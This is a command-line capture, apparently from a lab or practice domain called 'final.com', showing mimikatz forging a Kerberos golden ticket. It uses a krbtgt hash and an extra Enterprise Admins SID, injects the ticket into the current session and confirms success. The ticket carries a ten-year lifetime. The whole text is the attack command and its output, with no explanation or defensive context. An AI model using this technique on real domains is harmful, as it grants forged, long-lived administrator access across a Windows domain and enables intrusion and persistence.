c:\\Users\\Administrator\\Desktop>**mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt" "exit"**
mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt
User : Administrator
Domain : final.com (FINAL)
SID : S-1-5-21-1725955968-4040474791-670206374
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-1725955968-4040474791-670206374-519 ;
ServiceKey: 405854caaf49b41e0e585369a001f114 - rc4_hmac_nt
Lifetime : 8/4/2022 2:41:33 AM ; 8/1/2032 2:41:33 AM ; 8/1/2032 2:41:33 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ final.com' successfully submitted for current session
mimikatz(commandline) # exit
Bye!